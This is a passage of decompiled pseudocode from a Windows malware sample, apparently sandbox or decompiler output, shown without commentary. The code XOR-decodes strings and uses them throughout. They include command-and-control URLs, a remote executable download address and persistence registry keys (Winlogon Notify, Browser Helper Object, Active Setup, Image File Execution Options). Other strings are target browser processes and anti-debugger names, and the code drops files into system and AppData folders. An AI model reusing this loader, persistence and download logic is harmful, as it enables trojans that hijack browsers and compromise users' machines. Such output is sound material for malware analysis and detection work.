							}
							_t510 = LoadLibraryA("rasapi32.dll"); // executed
							__eflags = _t510;
							_t1166 = _t510;
							if(_t510 == 0) {
								 *0x4121b0 = 0;
								L86:
								_t511 = "iphlpapi.dll";
								while(1) {
									__eflags = _t511 - 0x410701;
									if(_t511 >= 0x410701) {
										break;
									}
									 *_t511 =  *_t511 ^ 0x000000d4;
									_t511 =  &(_t511[1]);
								}
								_t512 = LoadLibraryA("iphlpapi.dll"); // executed
								__eflags = _t512;
								_t1167 = _t512;
								if(_t512 == 0) {
									 *0x4121c0 = 0;
									L95:
									_t513 = "_Classes";
									while(1) {
										__eflags = _t513 - 0x4106e5;
										if(_t513 >= 0x4106e5) {
											break;
										}
										 *_t513 =  *_t513 ^ 0x000000d4;
										_t513 =  &(_t513[1]);
									}
									_t514 = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings";
									while(1) {
										__eflags = _t514 - 0x4106dc;
										if(_t514 >= 0x4106dc) {
											break;
										}
										 *_t514 =  *_t514 ^ 0x000000d4;
										__eflags =  *_t514;
										_t514 = (_t514 ^ _t1232) + 1;
									}
									_t515 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections";
									while(1) {
										__eflags = _t515 - 0x410687;
										if(_t515 >= 0x410687) {
											break;
										}
										 *_t515 =  *_t515 ^ 0x000000d4;
										__eflags =  *_t515;
										_t515 = (_t515 ^ _t1232) + 1;
									}
									_t516 = "ProxyEnable";
									while(1) {
										__eflags = _t516 - 0x410621;
										if(_t516 >= 0x410621) {
											break;
										}
										 *_t516 =  *_t516 ^ 0x000000d4;
										__eflags =  *_t516;
										_t516 = (_t516 ^ _t1232) + 1;
									}
									_t517 = "Connections";
									while(1) {
										__eflags = _t517 - 0x410615;
										if(_t517 >= 0x410615) {
											break;
										}
										 *_t517 =  *_t517 ^ 0x000000d4;
										__eflags =  *_t517;
										_t517 = (_t517 ^ _t1232) + 1;
									}
									_t518 = "wininet.dll";
									while(1) {
										__eflags = _t518 - 0x410609;
										if(_t518 >= 0x410609) {
											break;
										}
										 *_t518 =  *_t518 ^ 0x000000d4;
										__eflags =  *_t518;
										_t518 = (_t518 ^ _t1232) + 1;
									}
									_t519 = LoadLibraryA("wininet.dll"); // executed
									__eflags = _t519;
									_t1168 = _t519;
									if(_t519 == 0) {
										 *0x4121d0 = 0;
										L136:
										_t520 = "winrnt.exe";
										while(1) {
											__eflags = _t520 - 0x4105a6;
											if(_t520 >= 0x4105a6) {
												break;
											}
											 *_t520 =  *_t520 ^ 0x000000d4;
											_t520 =  &(_t520[1]);
										}
										_t521 = "rmass.exe";
										while(1) {
											__eflags = _t521 - 0x41059b;
											if(_t521 >= 0x41059b) {
												break;
											}
											 *_t521 =  *_t521 ^ 0x000000d4;
											__eflags =  *_t521;
											_t521 = (_t521 ^ _t1232) + 1;
										}
										_t522 = "RECOVER32.DLL";
										while(1) {
											__eflags = _t522 - 0x410591;
											if(_t522 >= 0x410591) {
												break;
											}
											 *_t522 =  *_t522 ^ 0x000000d4;
											__eflags =  *_t522;
											_t522 = (_t522 ^ _t1232) + 1;
										}
										_t523 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}";
										while(1) {
											__eflags = _t523 - 0x410583;
											if(_t523 >= 0x410583) {
												break;
											}
											 *_t523 =  *_t523 ^ 0x000000d4;
											__eflags =  *_t523;
											_t523 = (_t523 ^ _t1232) + 1;
										}
										_t524 = "gymspzd.dll";
										while(1) {
											__eflags = _t524 - 0x41051a;
											if(_t524 >= 0x41051a) {
												break;
											}
											 *_t524 =  *_t524 ^ 0x000000d4;
											__eflags =  *_t524;
											_t524 = (_t524 ^ _t1232) + 1;
										}
										_t525 = "aset32.exe";
										while(1) {
											__eflags = _t525 - 0x41050e;
											if(_t525 >= 0x41050e) {
												break;
											}
											 *_t525 =  *_t525 ^ 0x000000d4;
											__eflags =  *_t525;
											_t525 = (_t525 ^ _t1232) + 1;
										}
										_t526 = "ahuy.exe";
										while(1) {
											__eflags = _t526 - 0x410503;
											if(_t526 >= 0x410503) {
												break;
											}
											 *_t526 =  *_t526 ^ 0x000000d4;
											__eflags =  *_t526;
											_t526 = (_t526 ^ _t1232) + 1;
										}
										_t527 = "idbg32.exe";
										while(1) {
											__eflags = _t527 - 0x4104fa;
											if(_t527 >= 0x4104fa) {
												break;
											}
											 *_t527 =  *_t527 ^ 0x000000d4;
											__eflags =  *_t527;
											_t527 = (_t527 ^ _t1232) + 1;
										}
										_t528 = "ntdbg.exe";
										while(1) {
											__eflags = _t528 - 0x4104ef;
											if(_t528 >= 0x4104ef) {
												break;
											}
											 *_t528 =  *_t528 ^ 0x000000d4;
											__eflags =  *_t528;
											_t528 = (_t528 ^ _t1232) + 1;
										}
										_t529 = "http://%s.biz/d/N?";
										while(1) {
											__eflags = _t529 - 0x4104e5;
											if(_t529 >= 0x4104e5) {
												break;
											}
											 *_t529 =  *_t529 ^ 0x000000d4;
											__eflags =  *_t529;
											_t529 = (_t529 ^ _t1232) + 1;
										}
										_t530 = "http://%s.biz/d/G?";
										while(1) {
											__eflags = _t530 - 0x4104d2;
											if(_t530 >= 0x4104d2) {
												break;
											}
											 *_t530 =  *_t530 ^ 0x000000d4;
											__eflags =  *_t530;
											_t530 = (_t530 ^ _t1232) + 1;
										}
										_t531 = "http://utbidet-ugeas.biz/d/rpt?";
										while(1) {
											__eflags = _t531 - 0x4104bf;
											if(_t531 >= 0x4104bf) {
												break;
											}
											 *_t531 =  *_t531 ^ 0x000000d4;
											__eflags =  *_t531;
											_t531 = (_t531 ^ _t1232) + 1;
										}
										_t532 = "modem";
										while(1) {
											__eflags = _t532 - 0x41049d;
											if(_t532 >= 0x41049d) {
												break;
											}
											 *_t532 =  *_t532 ^ 0x000000d4;
											__eflags =  *_t532;
											_t532 = (_t532 ^ _t1232) + 1;
										}
										_t533 = "isdn";
										while(1) {
											__eflags = _t533 - 0x410497;
											if(_t533 >= 0x410497) {
												break;
											}
											 *_t533 =  *_t533 ^ 0x000000d4;
											__eflags =  *_t533;
											_t533 = (_t533 ^ _t1232) + 1;
										}
										_t534 = "%u.%u.%u.%s";
										while(1) {
											__eflags = _t534 - 0x410492;
											if(_t534 >= 0x410492) {
												break;
											}
											 *_t534 =  *_t534 ^ 0x000000d4;
											__eflags =  *_t534;
											_t534 = (_t534 ^ _t1232) + 1;
										}
										_t535 = "{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}";
										while(1) {
											__eflags = _t535 - 0x410486;
											if(_t535 >= 0x410486) {
												break;
											}
											 *_t535 =  *_t535 ^ 0x000000d4;
											__eflags =  *_t535;
											_t535 = (_t535 ^ _t1232) + 1;
										}
										_t536 = "%ComSpec%";
										while(1) {
											__eflags = _t536 - 0x410425;
											if(_t536 >= 0x410425) {
												break;
											}
											 *_t536 =  *_t536 ^ 0x000000d4;
											__eflags =  *_t536;
											_t536 = (_t536 ^ _t1232) + 1;
										}
										_t537 = "%CommonProgramFiles%\\System\\";
										while(1) {
											__eflags = _t537 - 0x41041b;
											if(_t537 >= 0x41041b) {
												break;
											}
											 *_t537 =  *_t537 ^ 0x000000d4;
											__eflags =  *_t537;
											_t537 = (_t537 ^ _t1232) + 1;
										}
										_t538 = "%AppData%\\";
										while(1) {
											__eflags = _t538 - 0x4103fe;
											if(_t538 >= 0x4103fe) {
												break;
											}
											 *_t538 =  *_t538 ^ 0x000000d4;
											__eflags =  *_t538;
											_t538 = (_t538 ^ _t1232) + 1;
										}
										_t539 = "Debugger";
										while(1) {
											__eflags = _t539 - 0x4103f3;
											if(_t539 >= 0x4103f3) {
												break;
											}
											 *_t539 =  *_t539 ^ 0x000000d4;
											__eflags =  *_t539;
											_t539 = (_t539 ^ _t1232) + 1;
										}
										_t540 = "IsInstalled";
										while(1) {
											__eflags = _t540 - 0x4103ea;
											if(_t540 >= 0x4103ea) {
												break;
											}
											 *_t540 =  *_t540 ^ 0x000000d4;
											__eflags =  *_t540;
											_t540 = (_t540 ^ _t1232) + 1;
										}
										_t541 = "StubPath";
										while(1) {
											__eflags = _t541 - 0x4103de;
											if(_t541 >= 0x4103de) {
												break;
											}
											 *_t541 =  *_t541 ^ 0x000000d4;
											__eflags =  *_t541;
											_t541 = (_t541 ^ _t1232) + 1;
										}
										_t542 = "museum";
										while(1) {
											__eflags = _t542 - 0x4103d5;
											if(_t542 >= 0x4103d5) {
												break;
											}
											 *_t542 =  *_t542 ^ 0x000000d4;
											__eflags =  *_t542;
											_t542 = (_t542 ^ _t1232) + 1;
										}
										_t543 = "GET /%s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)\r\n\r\n";
										while(1) {
											__eflags = _t543 - 0x4103ce;
											if(_t543 >= 0x4103ce) {
												break;
											}
											 *_t543 =  *_t543 ^ 0x000000d4;
											__eflags =  *_t543;
											_t543 = (_t543 ^ _t1232) + 1;
										}
										_t544 = "GET /%s HTTP/1.0\r\nHost: %s:%u\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)\r\n\r\n";
										while(1) {
											__eflags = _t544 - 0x410371;
											if(_t544 >= 0x410371) {
												break;
											}
											 *_t544 =  *_t544 ^ 0x000000d4;
											__eflags =  *_t544;
											_t544 = (_t544 ^ _t1232) + 1;
										}
										_t545 = "Mozilla/4.0 (compatible; MSIE 6.0; Win32)";
										while(1) {
											__eflags = _t545 - 0x410309;
											if(_t545 >= 0x410309) {
												break;
											}
											 *_t545 =  *_t545 ^ 0x000000d4;
											__eflags =  *_t545;
											_t545 = (_t545 ^ _t1232) + 1;
										}
										_t546 = "HTTP/1.0 200";
										while(1) {
											__eflags = _t546 - 0x4102c8;
											if(_t546 >= 0x4102c8) {
												break;
											}
											 *_t546 =  *_t546 ^ 0x000000d4;
											__eflags =  *_t546;
											_t546 = (_t546 ^ _t1232) + 1;
										}
										_t547 = "urlinj_conn";
										while(1) {
											__eflags = _t547 - 0x4102bb;
											if(_t547 >= 0x4102bb) {
												break;
											}
											 *_t547 =  *_t547 ^ 0x000000d4;
											__eflags =  *_t547;
											_t547 = (_t547 ^ _t1232) + 1;
										}
										_t548 = "urlinj_creat";
										while(1) {
											__eflags = _t548 - 0x4102af;
											if(_t548 >= 0x4102af) {
												break;
											}
											 *_t548 =  *_t548 ^ 0x000000d4;
											__eflags =  *_t548;
											_t548 = (_t548 ^ _t1232) + 1;
										}
										_t549 = "urlinj_xfer";
										while(1) {
											__eflags = _t549 - 0x4102a2;
											if(_t549 >= 0x4102a2) {
												break;
											}
											 *_t549 =  *_t549 ^ 0x000000d4;
											__eflags =  *_t549;
											_t549 = (_t549 ^ _t1232) + 1;
										}
										_t550 = "urlinj_creat_f";
										while(1) {
											__eflags = _t550 - 0x410296;
											if(_t550 >= 0x410296) {
												break;
											}
											 *_t550 =  *_t550 ^ 0x000000d4;
											__eflags =  *_t550;
											_t550 = (_t550 ^ _t1232) + 1;
										}
										_t551 = "urlinj_fork";
										while(1) {
											__eflags = _t551 - 0x410287;
											if(_t551 >= 0x410287) {
												break;
											}
											 *_t551 =  *_t551 ^ 0x000000d4;
											__eflags =  *_t551;
											_t551 = (_t551 ^ _t1232) + 1;
										}
										_t552 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced";
										while(1) {
											__eflags = _t552 - 0x41027b;
											if(_t552 >= 0x41027b) {
												break;
											}
											 *_t552 =  *_t552 ^ 0x000000d4;
											__eflags =  *_t552;
											_t552 = (_t552 ^ _t1232) + 1;
										}
										_t553 = "ConnPred";
										while(1) {
											__eflags = _t553 - 0x410230;
											if(_t553 >= 0x410230) {
												break;
											}
											 *_t553 =  *_t553 ^ 0x000000d4;
											__eflags =  *_t553;
											_t553 = (_t553 ^ _t1232) + 1;
										}
										_t554 = "UseExtProfile";
										while(1) {
											__eflags = _t554 - 0x410227;
											if(_t554 >= 0x410227) {
												break;
											}
											 *_t554 =  *_t554 ^ 0x000000d4;
											__eflags =  *_t554;
											_t554 = (_t554 ^ _t1232) + 1;
										}
										_t555 = "UseDflProfile";
										while(1) {
											__eflags = _t555 - 0x410219;
											if(_t555 >= 0x410219) {
												break;
											}
											 *_t555 =  *_t555 ^ 0x000000d4;
											__eflags =  *_t555;
											_t555 = (_t555 ^ _t1232) + 1;
										}
										_t556 = "http://utbidet-ugeas.biz/d/cc";
										while(1) {
											__eflags = _t556 - 0x41020b;
											if(_t556 >= 0x41020b) {
												break;
											}
											 *_t556 =  *_t556 ^ 0x000000d4;
											__eflags =  *_t556;
											_t556 = (_t556 ^ _t1232) + 1;
										}
										_t557 = "grazie.gif";
										while(1) {
											__eflags = _t557 - 0x4101ed;
											if(_t557 >= 0x4101ed) {
												break;
											}
											 *_t557 =  *_t557 ^ 0x000000d4;
											__eflags =  *_t557;
											_t557 = (_t557 ^ _t1232) + 1;
										}
										_t558 = "http://69.50.173.166/gdnOT2424.exe";
										while(1) {
											__eflags = _t558 - 0x4101e2;
											if(_t558 >= 0x4101e2) {
												break;
											}
											 *_t558 =  *_t558 ^ 0x000000d4;
											__eflags =  *_t558;
											_t558 = (_t558 ^ _t1232) + 1;
										}
										_t559 = "tombul.gif";
										while(1) {
											__eflags = _t559 - 0x4101a5;
											if(_t559 >= 0x4101a5) {
												break;
											}
											 *_t559 =  *_t559 ^ 0x000000d4;
											__eflags =  *_t559;
											_t559 = (_t559 ^ _t1232) + 1;
										}
										_t560 = "SubshellState";
										while(1) {
											__eflags = _t560 - 0x41019a;
											if(_t560 >= 0x41019a) {
												break;
											}
											 *_t560 =  *_t560 ^ 0x000000d4;
											__eflags =  *_t560;
											_t560 = (_t560 ^ _t1232) + 1;
										}
										_t561 = "g00d d0gg";
										while(1) {
											__eflags = _t561 - 0x41018c;
											if(_t561 >= 0x41018c) {
												break;
											}
											 *_t561 =  *_t561 ^ 0x000000d4;
											__eflags =  *_t561;
											_t561 = (_t561 ^ _t1232) + 1;
										}
										_t562 = "winlogon.exe";
										while(1) {
											__eflags = _t562 - 0x410182;
											if(_t562 >= 0x410182) {
												break;
											}
											 *_t562 =  *_t562 ^ 0x000000d4;
											__eflags =  *_t562;
											_t562 = (_t562 ^ _t1232) + 1;
										}
										_t563 = "explorer.exe";
										while(1) {
											__eflags = _t563 - 0x410175;
											if(_t563 >= 0x410175) {
												break;
											}
											 *_t563 =  *_t563 ^ 0x000000d4;
											__eflags =  *_t563;
											_t563 = (_t563 ^ _t1232) + 1;
										}
										_t564 = "iexplore.exe";
										while(1) {
											__eflags = _t564 - 0x410168;
											if(_t564 >= 0x410168) {
												break;
											}
											 *_t564 =  *_t564 ^ 0x000000d4;
											__eflags =  *_t564;
											_t564 = (_t564 ^ _t1232) + 1;
										}
										_t565 = "firefox.exe";
										while(1) {
											__eflags = _t565 - 0x41015b;
											if(_t565 >= 0x41015b) {
												break;
											}
											 *_t565 =  *_t565 ^ 0x000000d4;
											__eflags =  *_t565;
											_t565 = (_t565 ^ _t1232) + 1;
										}
										_t566 = "mozilla.exe";
										while(1) {
											__eflags = _t566 - 0x41014f;
											if(_t566 >= 0x41014f) {
												break;
											}
											 *_t566 =  *_t566 ^ 0x000000d4;
											__eflags =  *_t566;
											_t566 = (_t566 ^ _t1232) + 1;
										}
										_t567 = "seamonkey.exe";
										while(1) {
											__eflags = _t567 - 0x410143;
											if(_t567 >= 0x410143) {
												break;
											}
											 *_t567 =  *_t567 ^ 0x000000d4;
											__eflags =  *_t567;
											_t567 = (_t567 ^ _t1232) + 1;
										}
										_t568 = "opera.exe";
										while(1) {
											__eflags = _t568 - 0x410135;
											if(_t568 >= 0x410135) {
												break;
											}
											 *_t568 =  *_t568 ^ 0x000000d4;
											__eflags =  *_t568;
											_t568 = (_t568 ^ _t1232) + 1;
										}
										_t569 = "DLLName";
										while(1) {
											__eflags = _t569 - 0x41012b;
											if(_t569 >= 0x41012b) {
												break;
											}
											 *_t569 =  *_t569 ^ 0x000000d4;
											__eflags =  *_t569;
											_t569 = (_t569 ^ _t1232) + 1;
										}
										_t570 = "Startup";
										while(1) {
											__eflags = _t570 - 0x410123;
											if(_t570 >= 0x410123) {
												break;
											}
											 *_t570 =  *_t570 ^ 0x000000d4;
											__eflags =  *_t570;
											_t570 = (_t570 ^ _t1232) + 1;
										}
										_t571 = "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32";
										while(1) {
											__eflags = _t571 - 0x41011b;
											if(_t571 >= 0x41011b) {
												break;
											}
											 *_t571 =  *_t571 ^ 0x000000d4;
											__eflags =  *_t571;
											_t571 = (_t571 ^ _t1232) + 1;
										}
										_t572 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}";
										while(1) {
											__eflags = _t572 - 0x4100d0;
											if(_t572 >= 0x4100d0) {
												break;
											}
											 *_t572 =  *_t572 ^ 0x000000d4;
											__eflags =  *_t572;
											_t572 = (_t572 ^ _t1232) + 1;
										}
										_t573 = "ThreadingModel";
										while(1) {
											__eflags = _t573 - 0x41005e;
											if(_t573 >= 0x41005e) {
												break;
											}
											 *_t573 =  *_t573 ^ 0x000000d4;
											__eflags =  *_t573;
											_t573 = (_t573 ^ _t1232) + 1;
										}
										_t574 = "Both";
										while(1) {
											__eflags = _t574 - 0x41004f;
											if(_t574 >= 0x41004f) {
												break;
											}
											 *_t574 =  *_t574 ^ 0x000000d4;
											__eflags =  *_t574;
											_t574 = (_t574 ^ _t1232) + 1;
										}
										_t575 = "http://%s/";
										while(1) {
											__eflags = _t575 - 0x41004a;
											if(_t575 >= 0x41004a) {
												break;
											}
											 *_t575 =  *_t575 ^ 0x000000d4;
											__eflags =  *_t575;
											_t575 = (_t575 ^ _t1232) + 1;
										}
										while(1) {
											__eflags = 0x40fa40 - "http://%s/";
											if(0x40fa40 >= "http://%s/") {
												break;
											}
											 *0x40fa40 =  *0x40fa40 ^ 0x0000004d;
											__eflags =  *0x40fa40;
											 *(_t1312 + 0x40) =  *(_t1312 + 0x40) ^ _t1221;
										}
										while(1) {
											__eflags = 0x40e640 - 0x40fa40;
											if(0x40e640 >= 0x40fa40) {
												break;
											}
											 *0x40e640 =  *0x40e640 ^ 0x0000004d;
											__eflags =  *0x40e640;
											 *(_t1312 + 0x40) =  *(_t1312 + 0x40) ^ _t1221;
										}
										while(1) {
											__eflags = 0x408840 - 0x40e640;
											if(0x408840 >= 0x40e640) {
												break;
											}
											 *0x408840 =  *0x408840 ^ 0x0000004d;
											__eflags =  *0x408840;
											 *(_t1312 + 0x40) =  *(_t1312 + 0x40) ^ _t1221;
										}
										_t580 = CreateFileA(_t1316 + 0x1580, 0x80000000, 1, 0, 3, 0, 0); // executed
										 *(_t1316 + 0xa0) = _t580;
										__eflags = _t580;
										if(_t580 != 0) {
											__eflags = _t580 - 0xffffffff;
											if(_t580 != 0xffffffff) {
												SetFilePointer(_t580, 0xfffffff0, 0, 2); // executed
												ReadFile( *(_t1316 + 0xb0), 0x4120e0, 0x10, _t1316 + 0xa0, 0); // executed
												CloseHandle( *(_t1316 + 0xa0)); // executed
												__eflags =  *0x4120e0;
												if( *0x4120e0 == 0) {
													 *0x4120e0 = E004010B2();
													 *(_t1316 + 0x20) = 1;
												}
											}
										}
										_t581 = ".exe";
										while(1) {
											__eflags = _t581 - 0x408822;
											if(_t581 >= 0x408822) {
												break;
											}
											 *_t581 =  *_t581 ^ 0x000000d4;
											_t581 =  &(_t581[1]);
										}
										_t582 = ".dll";
										while(1) {
											__eflags = _t582 - 0x40881d;
											if(__eflags >= 0) {
												break;
											}
											 *_t582 =  *_t582 ^ 0x000000d4;
											__eflags =  *_t582;
											_t582 = (_t582 ^ _t1232) + 1;
										}
										_t583 =  *0x4120e0; // 0x8ff5b2f0
										 *(_t1316 + 0x9c) = _t583;
										 *0x412090 = E00401F84(".exe", _t1316 + 0x9c, __eflags);
										 *0x4120a0 = E00401F84(".exe", _t1316 + 0x9c, __eflags);
										 *0x4120b0 = E00401F84(".exe", _t1316 + 0x9c, __eflags);
										 *0x4120c0 = E00401F84(".dll", _t1316 + 0x9c, __eflags);
										_t1237 = _t1316 + 0x9c;
										_t593 = E00401F84(".dll", _t1237, __eflags);
										_push( *0x4120b0);
										 *0x4120d0 = _t593;
										_t595 = E004010DC(_t1316 + 0x156c);
										_push(_t595); // executed
										L00405E50(); // executed
										__eflags = _t595;
										_t74 = _t595 == 0;
										__eflags = _t74;
										 *(_t1316 + 0x1c) = (_t595 & 0xffffff00 | _t74) & 0x000000ff;
										_t598 = "qnd_b__-12";
										while(1) {
											__eflags = _t598 - 0x408818;
											if(_t598 >= 0x408818) {
												break;
											}
											 *_t598 =  *_t598 ^ 0x000000d4;
											__eflags =  *_t598;
											_t598 = (_t598 ^ _t1237) + 1;
										}
										_t599 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy";
										while(1) {
											__eflags = _t599 - 0x40880d;
											if(_t599 >= 0x40880d) {
												break;
											}
											 *_t599 =  *_t599 ^ 0x000000d4;
											__eflags =  *_t599;
											_t599 = (_t599 ^ _t1237) + 1;
										}
										_t600 = "Default Flags";
										while(1) {
											__eflags = _t600 - 0x4087a5;
											if(_t600 >= 0x4087a5) {
												break;
											}
											 *_t600 =  *_t600 ^ 0x000000d4;
											__eflags =  *_t600;
											_t600 = (_t600 ^ _t1237) + 1;
										}
										 *(_t1316 + 0x34) = 1;
										while(1) {
											_push( *(_t1316 + 0x34));
											wsprintfA(0x408816, "%02X");
											_t602 = CreateMutexA(0x408778, 1, "qnd_b__-12"); // executed
											 *(_t1316 + 0x1c) = _t602;
											_t1316 = _t1316 + 0xc;
											__eflags = _t602;
											if(_t602 == 0) {
												goto L436;
											}
											_t603 = GetLastError();
											__eflags = _t603 - 0xb7;
											if(_t603 != 0xb7) {
												__eflags =  *(_t1316 + 0x34) - 0x11;
												if( *(_t1316 + 0x34) > 0x11) {
													_t1169 = _t1316 + 0x134c;
													_t604 = ExpandEnvironmentStringsA("%ComSpec%", _t1169, 0x104);
													__eflags = _t604;
													if(_t604 != 0) {
														_t990 = CreateFileA(_t1169, 0x80000000, 1, 0, 3, 0, 0); // executed
														 *(_t1316 + 0xa0) = _t990;
														__eflags = _t990 - 0xffffffff;
														_t1276 = _t990;
														if(_t990 != 0xffffffff) {
															GetFileTime(_t1276, _t1316 + 0x84, _t1316 + 0x88, _t1316 + 0x8c);
															CloseHandle( *(_t1316 + 0xa0));
															 *(_t1316 + 0xc) = 1;
														}
													}
													__eflags =  *(_t1316 + 0x1c);
													if( *(_t1316 + 0x1c) != 0) {
														L458:
														_t606 = CreateFileA(_t1316 + 0x1580, 0x80000000, 1, 0, 3, 0, 0); // executed
														 *(_t1316 + 0xa0) = _t606;
														__eflags = _t606;
														if(_t606 == 0) {
															L461:
															 *(_t1316 + 0x14) = 0;
															_t1313 = 0;
															__eflags = 0;
															L462:
															_t609 = CreateThread(0, 0x1000, E00401038, _t1316 + 0x1570, 0, _t1316 + 0x9c); // executed
															CloseHandle(_t609);
															_t611 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe";
															while(1) {
																__eflags = _t611 - 0x408776;
																if(_t611 >= 0x408776) {
																	break;
																}
																 *_t611 =  *_t611 ^ 0x000000d4;
																_t611 =  &(_t611[1]);
															}
															while(1) {
																__eflags = 0x407b20 - "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe";
																if(0x407b20 >= "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe") {
																	break;
																}
																 *0x407b20 =  *0x407b20 ^ 0x0000004d;
																__eflags =  *0x407b20;
																 *(_t1313 + 0x40) =  *(_t1313 + 0x40) ^ _t1221;
															}
															__eflags =  *0x412100 - 2;
															if( *0x412100 != 2) {
																L494:
																 *(_t1316 + 0x78) = 0x10;
																_t1170 = _t1316 + 0x1ec;
																_t614 = GetComputerNameA(_t1170, _t1316 + 0x78); // executed
																__eflags = _t614;
																if(_t614 == 0) {
																	L496:
																	_push("QlC5hT0yHn63XEm5LqJ2OxSkGj2v");
																	_push(_t1316 + 0x1bc);
																	L00405E20();
																	L500:
																	wsprintfA("{38383738-3439-3838-3738-343938383738}", "{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}",  *((char*)(_t1316 + 0x1f4)),  *((char*)(_t1316 + 0x1f1)),  *((char*)(_t1316 + 0x1ee)),  *((char*)(_t1316 + 0x1eb)),  *((char*)(_t1316 + 0x1e8)),  *((char*)(_t1316 + 0x1e5)),  *((char*)(_t1316 + 0x1e2)),  *((char*)(_t1316 + 0x1df)),  *((char*)(_t1316 + 0x1dc)),  *((char*)(_t1316 + 0x1d9)),  *((char*)(_t1316 + 0x1d6)),  *((char*)(_t1316 + 0x1d3)),  *((char*)(_t1316 + 0x1d0)),  *((char*)(_t1316 + 0x1cd)),  *((char*)(_t1316 + 0x1ca)),  *((char*)(_t1316 + 0x1c7)));
																	_t1317 = _t1316 + 0x48;
																	_t633 = "SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\";
																	while(1) {
																		__eflags = _t633 - 0x407ad5;
																		if(_t633 >= 0x407ad5) {
																			break;
																		}
																		 *_t633 =  *_t633 ^ 0x000000d4;
																		_t633 =  &(_t633[1]);
																	}
																	while(1) {
																		__eflags = 0x4072a0 - "SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\";
																		if(0x4072a0 >= "SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\") {
																			break;
																		}
																		 *0x4072a0 =  *0x4072a0 ^ 0x0000004d;
																		__eflags =  *0x4072a0;
																		 *(_t1313 + 0x40) =  *(_t1313 + 0x40) ^ _t1221;
																	}
																	_push("{38383738-3439-3838-3738-343938383738}");
																	_push("SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\");
																	_t1171 =  &(_t1317[0x1040]);
																	_push(_t1171);
																	L00405E20();
																	_push(0x4072a0);
																	L00405E30();
																	_t636 = RegCreateKeyA(0x80000002, _t1171,  &(_t1317[0x98])); // executed
																	__eflags = _t636;
																	if(_t636 != 0) {
																		L531:
																		_t638 = E004030DE( &(_t1317[0x7b8]));
																		_t1317[0x98] = _t638;
																		__eflags = _t638;
																		if(_t638 == 0) {
																			L551:
																			_t639 = E004010B2();
																			__eflags = _t639;
																			_t1238 = _t639;
																			if(_t639 == 0) {
																				_t1238 = 0x42;
																			}
																			_t1317[0x7b8] = _t1238;
																			_t640 = E004010B2();
																			__eflags = _t640;
																			_t1239 = _t640;
																			if(_t640 == 0) {
																				_t1239 = 0x4d;
																			}
																			_t1317[0x589] = _t1239;
																			_push( *0x4120b0);
																			_push( &(_t1317[0x58e]));
																			L00405E20();
																			_push( &(_t1317[0x1568]));
																			_push( &(_t1317[0x6b2]));
																			L00405E20();
																			_t1287 = _t1317[0x14];
																			_t644 = _t1287 + _t1313;
																			while(1) {
																				__eflags = _t1287 - _t644;
																				if(_t1287 >= _t644) {
																					break;
																				}
																				 *_t1287 =  *_t1287 ^ _t1317[0x589] & 0x000000ff;
																				_t1287 =  &(_t1287[0]);
																				_t644 = _t1317[0x14] + _t1313;
																			}
																			_t1172 =  &(_t1317[0x145c]);
																			_t645 = ExpandEnvironmentStringsA("%AppData%\\", _t1172, 0x104);
																			__eflags = _t645;
																			if(_t645 == 0) {
																				L562:
																				_t1173 =  &(_t1317[0x1458]);
																				_t646 = GetTempPathA(0x104, _t1173);
																				__eflags = _t646;
																				if(_t646 == 0) {
																					L570:
																					E00401029(_t1317[0x14]);
																					_t1174 =  &(_t1317[0xe1c]);
																					_t649 = GetSystemDirectoryA(_t1174, 0x104);
																					_push(0x80);
																					_push( *0x4120c0);
																					_push(0x41103e);
																					_push(_t1174);
																					L00405E30();
																					L00405E30();
																					SetFileAttributesA(_t649, _t649); // executed
																					_t651 = CreateFileA(_t1174, 0x40000000, 0, 0, 2, 0x80, 0); // executed
																					_t1317[0xa0] = _t651;
																					__eflags = _t651;
																					if(_t651 == 0) {
																						L577:
																						_t652 = GetLastError();
																						__eflags = _t652 - 0x20;
																						if(_t652 != 0x20) {
																							_t1175 =  &(_t1317[0xe1c]);
																							_t653 = ExpandEnvironmentStringsA("%AppData%\\", _t1175, 0x104);
																							_push(0x80);
																							_push( *0x4120c0);
																							L00405E30();
																							SetFileAttributesA(_t653, _t1175);
																							_t655 = CreateFileA(_t1175, 0x40000000, 0, 0, 2, 0x80, 0);
																							_t1317[0xa0] = _t655;
																							__eflags = _t655;
																							if(_t655 == 0) {
																								L581:
																								_t656 = GetLastError();
																								__eflags = _t656 - 0x20;
																								if(_t656 == 0x20) {
																									goto L578;
																								}
																								_t827 = GetTempPathA(0x104, _t1175);
																								_push(0x80);
																								_push( *0x4120c0);
																								L00405E30();
																								SetFileAttributesA(_t827, _t1175);
																								_t829 = CreateFileA(_t1175, 0x40000000, 0, 0, 2, 0x80, 0);
																								_t1317[0xa0] = _t829;
																								__eflags = _t829;
																								if(_t829 == 0) {
																									L584:
																									_t830 = GetLastError();
																									__eflags = _t830 - 0x20;
																									if(_t830 == 0x20) {
																										goto L578;
																									}
																									L587:
																									_t1176 =  &(_t1317[0xd0c]);
																									_t661 = ExpandEnvironmentStringsA("%AppData%\\", _t1176, 0x104);
																									_push(0x80);
																									_push( *0x4120d0);
																									L00405E30();
																									SetFileAttributesA(_t661, _t1176); // executed
																									_t663 = CreateFileA(_t1176, 0x40000000, 0, 0, 2, 0x80, 0); // executed
